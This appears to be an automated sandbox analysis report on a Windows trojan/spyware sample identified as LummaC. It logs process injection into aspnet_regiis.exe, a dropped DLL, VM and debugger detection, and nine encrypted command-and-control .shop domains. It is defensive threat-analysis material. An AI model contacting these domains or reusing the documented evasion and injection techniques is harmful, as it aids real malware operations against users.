Source: Armanivenntii_crypted_EASY.exe	Binary or memory string: OriginalFilenameWendy251Michael.pdfP vs Armanivenntii_crypted_EASY.exe

Source: Armanivenntii_crypted_EASY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@11/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00427C9B CoCreateInstance,

2_2_00427C9B

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

File created: C:\Users\user\AppData\Roaming\d3d9x.dll

Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Mutant created: \Sessions\1\BaseNamedObjects\donutfatshitlatte
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7408

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e4ac1b55-2c07-493d-8614-1a5efd9e9291

Jump to behavior

Source: Armanivenntii_crypted_EASY.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Armanivenntii_crypted_EASY.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Armanivenntii_crypted_EASY.exe

ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe "C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe"
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Armanivenntii_crypted_EASY.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Armanivenntii_crypted_EASY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: d3d9x.dll.0.dr

Static PE information: section name: ./Wm

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Code function: 0_2_6CDE2F71 push ecx; ret

0_2_6CDE2F84

Source: Armanivenntii_crypted_EASY.exe	Static PE information: section name: .text entropy: 6.970733999325173
Source: d3d9x.dll.0.dr	Static PE information: section name: .text entropy: 6.84152168311668

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

File created: C:\Users\user\AppData\Roaming\d3d9x.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 2B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 2B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 52E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 62E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 6410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory allocated: 7410000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9x.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe TID: 7400	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7428	Thread sleep time: -330000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: aspnet_regiis.exe, 00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2049691966.0000000002BBD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2310023537.0000000002B7B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API call chain: ExitProcess graph end node

graph_2-11517

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00433420 LdrInitializeThunk,

2_2_00433420

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Code function: 0_2_6CDD7CC1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CDD7CC1

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDD7CC1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDD7CC1
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDDBCF5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6CDDBCF5
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Code function: 0_2_6CDD76D1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6CDD76D1

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: weiggheticulop.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: consciousourwi.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: southedhiscuso.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: deicedosmzj.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: cagedwifedsozm.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: charecteristicdxp.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: interactiedovspm.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: potentioallykeos.shop
Source: Armanivenntii_crypted_EASY.exe, 00000000.00000002.1696416033.000000006CDEB000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: weaknessmznxo.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 437000	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43A000	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 449000	Jump to behavior
Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27DD008	Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe

Code function: 0_2_6CDD7EB9 cpuid

0_2_6CDD7EB9

Source: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe	Queries volume information: C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
